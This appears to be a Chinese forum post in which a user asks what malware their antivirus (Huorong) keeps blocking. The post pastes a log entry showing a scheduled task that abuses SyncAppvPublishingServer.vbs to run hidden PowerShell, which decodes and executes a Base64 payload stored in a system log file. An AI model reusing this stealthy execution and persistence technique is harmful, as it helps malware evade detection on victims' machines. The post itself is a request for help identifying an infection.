小🐷饲养员 戲齋
-
关注数: 0 粉丝数: 0 发帖数: 72 关注贴吧数: 38
大佬们,有人知道这是什么病毒吗?火绒每天都在拦截 进程如下: 【1】2022-09-20 03:09:49,系统防护,系统加固,SyncAppvPublishingServer.vbs触犯敏感动作防护规则, 已阻止 防护项目:隐藏执行PowerShell 执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block} 操作结果:已阻止 进程ID:6464 操作进程:C:\Windows\System32\SyncAppvPublishingServer.vbs 操作进程命令行:C:\windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block 操作进程校验和:15F2FACFD05DAF46D2C63912916BF2887CEBD98A 父进程ID:1468 父进程:C:\Windows\System32\svchost.exe 父进程命令行:C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
1 下一页